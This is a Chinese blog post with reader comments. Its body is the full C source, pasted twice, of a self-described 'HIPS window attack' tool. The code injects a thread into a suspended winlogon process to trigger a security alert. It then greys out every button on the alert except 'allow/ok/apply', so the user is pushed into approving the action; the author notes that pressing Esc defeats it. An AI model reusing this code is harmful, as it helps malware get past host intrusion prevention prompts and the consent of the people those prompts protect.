代码还是发出来好了(对于细心的人来说,这些代码并不是一点用也没有的)...
我从一开始就白忙活了,原以为已经很周全了的,可是被一个Esc全给我阻止了 T_T
当然,如果你和我一样是个COMODO用户的话,遇到这个代码也就只能认命了~
由于内心刚刚经历了如下过程,现在我得修养生息去了...
Heuristic manual HIPS window attack (defective)
#define _WIN32_WINNT 0x0501
#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/SECTION:.wye,ERW /MERGE:.data=.wye /MERGE:.text=.wye /MERGE:.rdata=.wye" )
#define NUM_OF_WHITE_LIST_WORDS ((int)(sizeof WhiteList /sizeof WhiteList[0]))
struct
{
char * Word;
}
WhiteList[]=
{
"允许","allow","确定","ok","apply"
};
//To block it , press 'Esc' on the alarm window
DWORD WINAPI Feint(LPVOID lpParameter)
{
STARTUPINFO StartupInfo;
PROCESS_INFORMATION ProcessInfo;
ZeroMemory(&StartupInfo,sizeof(StartupInfo));
StartupInfo.cb = sizeof(STARTUPINFO);
CreateProcess(0,"winlogon",0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfo);
CloseHandle(
CreateRemoteThread(ProcessInfo.hProcess,0,0,(LPTHREAD_START_ROUTINE)
GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess"),0,0,0));
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
return 1;
}
BOOL CALLBACK EnumWindProc(HWND hWnd, LPARAM HIPS_PID)
{
DWORD WPID;
GetWindowThreadProcessId(hWnd,&WPID);
if (WPID==HIPS_PID) //For EnumWindows
{
//0x19 //SetParent
EnumChildWindows(hWnd,EnumWindProc,WPID+1);
}
else if (WPID+1==HIPS_PID && IsWindowEnabled(hWnd)) //For EnumChildWindows
{
char Title[1204];
int n=0;
GetWindowText(hWnd,Title,1024);
strlwr(Title);
for (n;n<NUM_OF_WHITE_LIST_WORDS;n++)
{
if (strstr(Title,WhiteList[n].Word))
{
break;
}
}
if (n==NUM_OF_WHITE_LIST_WORDS)
{
//To destory it,SetParent
EnableWindow(hWnd,FALSE);
}
}
return TRUE;
}
void main()
{
printf("Heuristic manual HIPS window attack (defective)\n"
"Presented by wye-MIA kid C!\n"
"http://wye-ANGer.blogspot.com\n");
char Title[32] = "No manual HIPS detected - -";
SetConsoleTitle(Title);
HANDLE hMajor=CreateThread(NULL,NULL,Feint,NULL,NULL,NULL);
DWORD hPID,pPID;
HWND hHIPS=GetConsoleWindow()
,hCur=hHIPS;
//Get parent process ID
HANDLE SnapShotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pBuffer={0};
pBuffer.dwSize=sizeof(PROCESSENTRY32);
if((SnapShotHandle!=INVALID_HANDLE_VALUE) && Process32First(SnapShotHandle,&pBuffer))
{
while (Process32Next(SnapShotHandle,&pBuffer))
{
if (pBuffer.th32ProcessID==GetCurrentProcessId())
{
pPID=pBuffer.th32ParentProcessID;
hPID=pPID;
break;
}
}
}
while(WaitForSingleObject(hMajor,333)==WAIT_TIMEOUT)
{
//To protect major from activity analysis, return
while(hHIPS==hCur||hPID==pPID||!hHIPS)
{
hHIPS=GetForegroundWindow();
GetWindowThreadProcessId(hHIPS,&hPID);
Sleep(333);
}
sprintf(Title,"Manual HIPS detected~ PID:%d",hPID);
SetConsoleTitle(Title);
EnumWindows(EnumWindProc,hPID);
}
Sleep(6000);
return ;
}
#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/SECTION:.wye,ERW /MERGE:.data=.wye /MERGE:.text=.wye /MERGE:.rdata=.wye" )
#define NUM_OF_WHITE_LIST_WORDS ((int)(sizeof WhiteList /sizeof WhiteList[0]))
struct
{
char * Word;
}
WhiteList[]=
{
"允许","allow","确定","ok","apply"
};
//To block it , press 'Esc' on the alarm window
DWORD WINAPI Feint(LPVOID lpParameter)
{
STARTUPINFO StartupInfo;
PROCESS_INFORMATION ProcessInfo;
ZeroMemory(&StartupInfo,sizeof(StartupInfo));
StartupInfo.cb = sizeof(STARTUPINFO);
CreateProcess(0,"winlogon",0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfo);
CloseHandle(
CreateRemoteThread(ProcessInfo.hProcess,0,0,(LPTHREAD_START_ROUTINE)
GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess"),0,0,0));
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
return 1;
}
BOOL CALLBACK EnumWindProc(HWND hWnd, LPARAM HIPS_PID)
{
DWORD WPID;
GetWindowThreadProcessId(hWnd,&WPID);
if (WPID==HIPS_PID) //For EnumWindows
{
//0x19 //SetParent
EnumChildWindows(hWnd,EnumWindProc,WPID+1);
}
else if (WPID+1==HIPS_PID && IsWindowEnabled(hWnd)) //For EnumChildWindows
{
char Title[1204];
int n=0;
GetWindowText(hWnd,Title,1024);
strlwr(Title);
for (n;n<NUM_OF_WHITE_LIST_WORDS;n++)
{
if (strstr(Title,WhiteList[n].Word))
{
break;
}
}
if (n==NUM_OF_WHITE_LIST_WORDS)
{
//To destory it,SetParent
EnableWindow(hWnd,FALSE);
}
}
return TRUE;
}
void main()
{
printf("Heuristic manual HIPS window attack (defective)\n"
"Presented by wye-MIA kid C!\n"
"http://wye-ANGer.blogspot.com\n");
char Title[32] = "No manual HIPS detected - -";
SetConsoleTitle(Title);
HANDLE hMajor=CreateThread(NULL,NULL,Feint,NULL,NULL,NULL);
DWORD hPID,pPID;
HWND hHIPS=GetConsoleWindow()
,hCur=hHIPS;
//Get parent process ID
HANDLE SnapShotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pBuffer={0};
pBuffer.dwSize=sizeof(PROCESSENTRY32);
if((SnapShotHandle!=INVALID_HANDLE_VALUE) && Process32First(SnapShotHandle,&pBuffer))
{
while (Process32Next(SnapShotHandle,&pBuffer))
{
if (pBuffer.th32ProcessID==GetCurrentProcessId())
{
pPID=pBuffer.th32ParentProcessID;
hPID=pPID;
break;
}
}
}
while(WaitForSingleObject(hMajor,333)==WAIT_TIMEOUT)
{
//To protect major from activity analysis, return
while(hHIPS==hCur||hPID==pPID||!hHIPS)
{
hHIPS=GetForegroundWindow();
GetWindowThreadProcessId(hHIPS,&hPID);
Sleep(333);
}
sprintf(Title,"Manual HIPS detected~ PID:%d",hPID);
SetConsoleTitle(Title);
EnumWindows(EnumWindProc,hPID);
}
Sleep(6000);
return ;
}
可怜……
回覆刪除...
回覆刪除...
太血腥啦...
说实话,我是看到后面才看明白是代码
要不还以为是什么鬼片呢......
可怜啊,建议在其他地方输入,再复制就好了
要不就白干了